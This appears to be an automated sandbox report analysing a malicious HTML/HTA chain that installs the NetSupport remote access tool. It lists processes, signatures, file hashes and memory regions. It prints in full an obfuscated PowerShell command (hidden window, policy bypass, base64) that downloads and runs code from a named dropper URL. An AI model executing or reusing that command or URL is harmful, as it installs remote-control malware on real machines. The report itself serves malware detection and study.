Analysis

  • max time kernel
    110s
  • max time network
    117s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    02-11-2022 12:26

General

  • Target

    i-srvs0000022933.html

  • Size

    230B

  • MD5

    ba62081cefcdff3aefe32b0817abd2b6

  • SHA1

    07531731162bda20d86f701854c59a98887dcc36

  • SHA256

    7fab3cad04a892ab929b6efb92854757e25b3d4b8648c2eca1a55164791d36b4

  • SHA512

    ca7edb18aa173c2d20dfeb4425ae218a36d0a57eeb1b3a7a8e15bfe31ab09eae1b6a908ff6ec0a465e8966a0101a8fe78390a7734951f0e632a7c8d54cb86931

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs
    ps1.dropper: https://8llc.net/lite/index.php

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as legitimate system administration software.

  • Blocklisted process makes network request (3 IoCs)
  • Executes dropped EXE (1 IoC)
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up the country code configured in the registry, likely a geofence.

  • Loads dropped DLL (7 IoCs)
  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash (1 IoC)
  • Enumerates system info in registry (2 TTPs, 3 IoCs)
  • Modifies Internet Explorer settings (1 TTP, 52 IoCs)
  • Modifies registry class (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (21 IoCs)
  • Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (5 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of FindShellTrayWindow (38 IoCs)
  • Suspicious use of SendNotifyMessage (24 IoCs)
  • Suspicious use of SetWindowsHookEx (8 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\i-srvs0000022933.html
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4288
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4288 CREDAT:17410 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:2556
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 444 -p 1336 -ip 1336
    1⤵
    PID:1928
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 1336 -s 2460
    1⤵
    • Program crash
    PID:1600
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3328
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffe18d74f50,0x7ffe18d74f60,0x7ffe18d74f70
      2⤵
      PID:2952
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1700 /prefetch:2
      2⤵
      PID:4980
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1972 /prefetch:8
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:4020
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2308 /prefetch:8
      2⤵
      PID:1216
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2984 /prefetch:1
      2⤵
      PID:3908
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
      2⤵
      PID:3536
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:1
      2⤵
      PID:4384
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4524 /prefetch:8
      2⤵
      PID:840
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4652 /prefetch:8
      2⤵
      PID:2836
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4796 /prefetch:8
      2⤵
      PID:5148
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
      2⤵
      PID:5224
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:8
      2⤵
      PID:5312
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 /prefetch:8
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:5344
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5080 /prefetch:8
      2⤵
      PID:5360
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4520 /prefetch:8
      2⤵
      PID:5420
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5756 /prefetch:8
      2⤵
      PID:5452
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
      2⤵
      PID:5484
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5644 /prefetch:8
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:5540
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4784 /prefetch:8
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:5656
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5048 /prefetch:8
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:5716
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\2380350551.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • Checks computer location settings
      PID:5732
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwA4AGwAbABjAC4AbgBlAHQALwBsAGkAdABlAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
        3⤵
        PID:5820
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwA4AGwAbABjAC4AbgBlAHQALwBsAGkAdABlAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
          4⤵
          • Blocklisted process makes network request
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5876
          • C:\Users\Admin\AppData\Roaming\aw5BDkZi\presentationhost.exe
            "C:\Users\Admin\AppData\Roaming\aw5BDkZi\presentationhost.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:6040
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:8
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:724
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2648 /prefetch:8
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:448
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4488 /prefetch:8
      2⤵
      PID:4700
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,14416111502326521513,9343718925179594166,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5564 /prefetch:8
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:2800
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:1816

Network

MITRE ATT&CK Enterprise v6


Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize: 1KB
    MD5: f2821cffa78f8d9887893c8ac7b34b95
    SHA1: d0f5be42f8b09d9c42033d2b8e6c28944972fbe7
    SHA256: 84a9e3a3afb829d498f2233c284f4137e61329a821698f1d27dceb1906d1b865
    SHA512: 539748691722ec7d4694e9f8e705a4e6ad2317fb6637b054e302fd8a2ed10863d9f1b41c56b7ceb2ca7e38315c9cab6a66b57bdbc8fb4f01de8555d65efa1e7b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C3F4CB4665DCF2109A8C91DBA78E447
    Filesize: 471B
    MD5: f07248c20e866490930ac1ca9d857761
    SHA1: 5aefd6f1cf230c8d1eeb58f5a10bd3d916b68a1a
    SHA256: e2bdb7050f96f393f039ccce321a5ddbb657b3360cb001cebe56f58516b08c8c
    SHA512: ab50b5cb1553c8fb3da1c6931ef15b3dda5bc8e7ac218f0522fcf8ddfe704610f9433eebe014197100da9fa7148fe275f1a5995c6f97f44b84fb6032abfd0721

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98
    Filesize: 472B
    MD5: f2b192e1868a74c2922ab18f7d7e7f88
    SHA1: 6e03042a622624b1c3ac7ff225fe06faf21be58b
    SHA256: 5cd12b742dd5d81fcbeeca0bb13b7949cd50fde2f576ae3f9a349728a71b488a
    SHA512: 2149468d7dab0c63077dfc0b59654c468f3f4c24364880f3e57dd9684c53fb845290024370681b83b3a2df877f3e75bdf284066d6f395626337770f3d07c1aa2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize: 471B
    MD5: 7f2493cd00cdff404b485b7f1b1ff70d
    SHA1: f2e016c46c38019514ea8b81be573ce45c04e82d
    SHA256: 60a2fb9c6b7c2dd729d9ee918ec9c4c96b91929eeaa298aa0057fea95cc47584
    SHA512: de253edc0f1b0ee02b8d533964e9651f3cd7c70411b6397a0ae208f6ebc5ab37bea664faa13aa7e79e0f20dd547c88676991feb28eed8e279efff3c870d82092

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
    Filesize: 724B
    MD5: f569e1d183b84e8078dc456192127536
    SHA1: 30c537463eed902925300dd07a87d820a713753f
    SHA256: 287bc80237497eb8681dbf136a56cc3870dd5bd12d48051525a280ae62aab413
    SHA512: 49553b65a8e3fc0bf98c1bc02bae5b22188618d8edf8e88e4e25932105796956ae8301c63c487e0afe368ea39a4a2af07935a808f5fb53287ef9287bc73e1012

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize: 410B
    MD5: 9d367b63148636f9e8e74dd221f481e5
    SHA1: f8193ff9ce48ff0301e35d20f9424b1f1ee3bb3f
    SHA256: b6ea659090113087b0c87f721bf0d52b3e6fcf08b9a3e87da5cd7351002f2e5e
    SHA512: 02e8d4017adcc7d78913db1daa07e363945f405a395e0e5cd9a0c32ccef7359a7d56dd5cdbddea509ea3a10d60c6ecaad8a13e1b277f481bc98847fdb14c1dd9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C3F4CB4665DCF2109A8C91DBA78E447
    Filesize: 410B
    MD5: 6d3be04c0497db75013a41c9accd2b90
    SHA1: 2e74e04ca6453cacd2ff29fcba05e2ac1a5819e9
    SHA256: 0426b67cb89537bccba3c738aed9f23a4d7adea2c3eca533259b82148480de2a
    SHA512: 2c4bff64ed6f1d34c3c9906810947ad1ae89f2148ed77115b441fe3fd606613e810249ac52ac9ad6a8e313ad4a5843e9b285a5fc83553f963ce3bd26bca3c734

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98
    Filesize: 406B
    MD5: c1004122f0e740aed6423c0ea2ba94f0
    SHA1: ff337c206ccb08e00a3ab92add342509ab175790
    SHA256: d57474074ab664efd0c2aeba7b9d759c92535b8c3cea2a89993b388631931960
    SHA512: 34b9cec5e06091f33475cf2e57eadd79ab64243d4edc22ad294f1920447f35a5475a84c5f3a285cee75f3d6a188737823d844bf92960b073efbd7728a69336a2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize: 434B
    MD5: 0a6ab03f98aa069f8445aff6a2ce7eb5
    SHA1: db3c95e9ece21f152bd34cfa678e9803e1133538
    SHA256: 747ec1fbd167660c3d9cd9706b3227a4fa7856b9a032dedf64b85389c68361f7
    SHA512: bf94de2eeb0066532b796121ac9d53495f14faf3a6568c7559620cd4d48f024cecdf172307f954dcc5cc62e937445d9a6b46bd957e933a2380ccf832ac97fd4a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
    Filesize: 392B
    MD5: a7604e2a45bb0a4729f363acb3c940aa
    SHA1: 3b19b723fd7420affd739af426c0389c248ca7ff
    SHA256: c9e1ac36d65146fa60a11a058569f798c06568428d06671795497e8c594d395d
    SHA512: e2daf34aa80c2a771c76cb4801c5639e191b1426f5fb9efd93cd9124da7f7664d69c8ef79d18386b148a99fe42f9d94d2e9a6c0b38cc692f11277e69d271204a

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\dqptnfu\imagestore.dat
    Filesize: 1KB
    MD5: f974c70869d1324e96f7b50e5fa0a3df
    SHA1: d9736a16da2212f6f1614627d6e27741a629d330
    SHA256: 71896148c4f2b4f17d0513f0c4a1277cea173da742c78c3554efde9533a2b216
    SHA512: 74145be9374b43c23aee7ef92604b216e3bbcb54555ff0a5991ff37547d66e95c1a7a63a61ae3189d4da853a8635e8b3a90302d708ee48636f44c8849b04a6b8

  • C:\Users\Admin\AppData\Roaming\aw5BDkZi\HTCTL32.DLL
    Filesize: 320KB
    MD5: c94005d2dcd2a54e40510344e0bb9435
    SHA1: 55b4a1620c5d0113811242c20bd9870a1e31d542
    SHA256: 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
    SHA512: 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a


  • C:\Users\Admin\AppData\Roaming\aw5BDkZi\MSVCR100.dll
    Filesize: 755KB
    MD5: 0e37fbfa79d349d672456923ec5fbbe3
    SHA1: 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
    SHA256: 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
    SHA512: 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

  • C:\Users\Admin\AppData\Roaming\aw5BDkZi\NSM.LIC
    Filesize: 259B
    MD5: 3a88847f4bbf7199a2161ed963fe88ef
    SHA1: 8629803adb6af84691dc5431b6590df14bad4a61
    SHA256: a680947aba5cf3316be50f1ec6a0d8bf72f7d7ca79d91430c26e24680eddd35e
    SHA512: 2b6408e7334946655045914b2cfa14dcfb39502f64ffafad784717a8ca036b73928bd7a5b02d650d8698357c54c31cac11a705baed0e1e7a3a07d659a2104e02

  • C:\Users\Admin\AppData\Roaming\aw5BDkZi\PCICHEK.DLL
    Filesize: 18KB
    MD5: 104b30fef04433a2d2fd1d5f99f179fe
    SHA1: ecb08e224a2f2772d1e53675bedc4b2c50485a41
    SHA256: 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
    SHA512: 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

  • C:\Users\Admin\AppData\Roaming\aw5BDkZi\PCICL32.DLL
    Filesize: 3.6MB
    MD5: d3d39180e85700f72aaae25e40c125ff
    SHA1: f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15
    SHA256: 38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5
    SHA512: 471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

                                        • C:\Users\Admin\AppData\Roaming\aw5BDkZi\PCICL32.dll

                                          Filesize

                                          3.6MB

                                          MD5

                                          d3d39180e85700f72aaae25e40c125ff

                                          SHA1

                                          f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

                                          SHA256

                                          38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

                                          SHA512

                                          471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

                                        • C:\Users\Admin\AppData\Roaming\aw5BDkZi\client32.ini

                                          Filesize

                                          925B

                                          MD5

                                          56e2df5f12ed677741d1bebc751a2cd0

                                          SHA1

                                          8b3db6f517d6ddaee7fde9c133283d54498ab105

                                          SHA256

                                          0544a5ce433a314ffd4362645e0cec27b9db34a4eef31a441a40d98f771661f5

                                          SHA512

                                          3a6293cf1bf431a4daa8086244637d836467e82ab90b3f95390825bbc431c48989f02d99e76776570acfee96f196b66e7ee45ea3323bcbb2661c2dd3bd5a54a9

                                        • C:\Users\Admin\AppData\Roaming\aw5BDkZi\msvcr100.dll

                                          Filesize

                                          755KB

                                          MD5

                                          0e37fbfa79d349d672456923ec5fbbe3

                                          SHA1

                                          4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

                                          SHA256

                                          8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

                                          SHA512

                                          2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

                                        • C:\Users\Admin\AppData\Roaming\aw5BDkZi\pcicapi.dll

                                          Filesize

                                          32KB

                                          MD5

                                          34dfb87e4200d852d1fb45dc48f93cfc

                                          SHA1

                                          35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

                                          SHA256

                                          2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

                                          SHA512

                                          f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

                                        • C:\Users\Admin\AppData\Roaming\aw5BDkZi\pcichek.dll

                                          Filesize

                                          18KB

                                          MD5

                                          104b30fef04433a2d2fd1d5f99f179fe

                                          SHA1

                                          ecb08e224a2f2772d1e53675bedc4b2c50485a41

                                          SHA256

                                          956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

                                          SHA512

                                          5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

                                        • C:\Users\Admin\AppData\Roaming\aw5BDkZi\presentationhost.exe

                                          Filesize

                                          109KB

                                          MD5

                                          b2b27ccaded1db8ee341d5bd2c373044

                                          SHA1

                                          1d0f9ca17c0961eeabffc2ba54e16854a13c8a9d

                                          SHA256

                                          e4985a9739637aad4a409c95da33a1304dc17fd6ef9046159b27c0b137a57911

                                          SHA512

                                          0987b11aa110ea6b6f4fe4361e587aff010508251644bdfb681a578fa4726fb56af039d55e0b74682fd7031414f665a98656186b220264c122a47d23751dcee1

                                        • C:\Users\Admin\Downloads\2380350551.hta

                                          Filesize

                                          21KB

                                          MD5

                                          df1316305178fe428f0d58f4bd80859f

                                          SHA1

                                          5c1e8492a357622d2a7429663e1b1872995421cd

                                          SHA256

                                          7538649dbb401672b157323df22a89b755b82bd4f4123154e8225476a44a6eff

                                          SHA512

                                          a0c589a170594a264f3d0ccf48cb67435025aceefb2dfcc00b031ada6c53c67ee87030ac7f045122a0b10e8af1774fb910b791f98be1814bcca46d23f6df7975

                                        • memory/5732-144-0x0000000000000000-mapping.dmp

                                        • memory/5820-146-0x0000000000000000-mapping.dmp

                                        • memory/5876-157-0x0000000007530000-0x0000000007552000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/5876-147-0x0000000000000000-mapping.dmp

                                        • memory/5876-156-0x0000000009C90000-0x0000000009D26000-memory.dmp

                                          Filesize

                                          600KB

                                        • memory/5876-155-0x00000000064C0000-0x00000000064DA000-memory.dmp

                                          Filesize

                                          104KB

                                        • memory/5876-152-0x00000000059E0000-0x0000000005A46000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/5876-150-0x0000000005240000-0x0000000005262000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/5876-154-0x0000000007610000-0x0000000007C8A000-memory.dmp

                                          Filesize

                                          6.5MB

                                        • memory/5876-158-0x000000000A2E0000-0x000000000A884000-memory.dmp

                                          Filesize

                                          5.6MB

                                        • memory/5876-148-0x0000000002A20000-0x0000000002A56000-memory.dmp

                                          Filesize

                                          216KB

                                        • memory/5876-149-0x0000000005340000-0x0000000005968000-memory.dmp

                                          Filesize

                                          6.2MB

                                        • memory/5876-153-0x0000000006020000-0x000000000603E000-memory.dmp

                                          Filesize

                                          120KB

                                        • memory/5876-151-0x0000000005970000-0x00000000059D6000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/6040-159-0x0000000000000000-mapping.dmp

                                        • memory/6040-165-0x0000000001510000-0x00000000018AA000-memory.dmp

                                          Filesize

                                          3.6MB